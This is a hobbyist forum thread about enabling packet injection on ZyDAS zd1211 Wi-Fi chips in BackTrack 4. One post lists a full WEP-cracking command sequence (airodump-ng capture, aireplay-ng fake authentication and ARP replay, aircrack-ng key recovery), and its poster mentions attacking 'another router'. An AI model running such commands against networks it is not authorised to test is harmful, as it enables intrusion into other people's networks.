Results 1 to 10 of 32

Thread: Tutorial: Injection with ZyDAS 1211 and 1211b (zd1211)

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Tutorial: Injection with ZyDAS 1211 and 1211b (zd1211)

    Tutorial on how to inject with zydas zd1211 and zd1211b usb chips.
    Tutorial URL here: forum.aircrack-ng.org/index.php?topic=5334.0

    Note: even though this driver is patched under BT4b if you apply those steps you will triple your injection speed!

  2. #2
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    18

    Default

    Is it patched in Backtrack 4 Pre Final?

  3. #3
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default

    Quote Originally Posted by themaster View Post
    Is it patched in Backtrack 4 Pre Final?
    I don't think so. At least for zd1211b... But even after the patch, it only injects about 1/3 of the time. But try and follow the tutorial, and if you have zd1211b, tell me how injection works.

  4. #4
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    18

    Default

    The injection finally works.. is how it works.. I've had this Atheros Chipset, zydas1211b for 2-3 years now.. and on every version of backtrack I could never make it work.. (last one I tried was backtrack 3 final or beta.. been a while..)

    Now in Backtrack 4 Pre Final.. it finally hacks properly.. (injects was it's problem with Bt3) I was just wondering if it would hack faster.. cause now after I broke my test router in 30 minutes (to speed up the hack.. I popped a client onto the router) I'm just watching it slow hack another router with no traffic.. and I was wondering if these patch's would do the speed up as talked about..

    Perhaphs as you say it only injects a 1/3 of the time explaining why this hack has been running passive for hours with only about 800 IV's

  5. #5
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default

    Quote Originally Posted by themaster View Post
    The injection finally works..
    Now in Backtrack 4 Pre Final.. it finally hacks properly.. (injects was it's problem with Bt3)
    Glad it works for you.

    Quote Originally Posted by themaster View Post
    I was just wondering if it would hack faster.. cause now after I broke my test router in 30 minutes (to speed up the hack.. I popped a client onto the router) I'm just watching it slow hack another router with no traffic.. and I was wondering if these patch's would do the speed up as talked about..
    Perhaps you should ask SliCk, he said it tripled the speed. And you should also ask if he as zd1211 or zd1211b, as there is a diference between the two chipsets (@everyone: correct me if i'm wrong). I think zd1211 works better, but I have no way to confirm it...

    Quote Originally Posted by themaster View Post
    I broke my test router in 30 minutes
    (...)
    Perhaphs as you say it only injects a 1/3 of the time explaining why this hack has been running passive for hours with only about 800 IV's
    I have a rt73 and it takes about 15 minutes to crack my network's WEP key, about half the time.
    To check if injection is running well, use:
    Code:
    aireplay-ng --test wlan0 (don't forget to set the channel to your router's channel,
    and I would like to know your results)
    What do you mean by "running passive"? Without ARP replay attack?

  6. #6
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    18

    Default

    Quote Originally Posted by Snayler View Post
    What do you mean by "running passive"? Without ARP replay attack?
    Terminology for this stuff is not my strong suit so here are my documented commands.. for my 1st successful hack..

    Window 1
    airodump-ng --bssid 00:22:75:38:E7:A8 mon0 -c 5 -w output

    Windows 2
    aireplay-ng -1 6000 mon0 -a 00:22:75:38:E7:A8

    Window 3
    aireplay-ng -3 mon0 -b 00:22:75:38:E7:A8 -e bla

    Window 4
    Decrypting of key..
    aircrack-ng output*.cap

    I'm currently working on installing the patch.. which is a bitch for me.. cause I don't have working internet in vmware.. or a working sd card reader.. finally just compiled up a ISO image of the 3 latest files..

    BTW.. I'm using Windows 7 Ultimate, vmware 6.5.2 and a amd x2 550 unlocked to a x4 50 w/ 6 Gb of ram running at 1300 mhz (just to speak full on geek)

  7. #7
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default

    Quote Originally Posted by themaster View Post
    BTW.. I'm using Windows 7 Ultimate, vmware 6.5.2 and a amd x2 550 unlocked to a x4 50 w/ 6 Gb of ram running at 1300 mhz (just to speak full on geek)
    Normaly vmware sets up automatically to share internet from the host (windows 7, in your case) to the guest (bt) through a virtual ethernet adapter. If you didn't deactivated "Network Adapter" from the devices, it should work.

  8. #8
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    18

    Default

    Quote Originally Posted by Snayler View Post
    Normaly vmware sets up automatically to share internet from the host (windows 7, in your case) to the guest (bt) through a virtual ethernet adapter. If you didn't deactivated "Network Adapter" from the devices, it should work.
    Yah I turned on Bridged cause that's what the tutorial video showed.. it was on NAT..

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •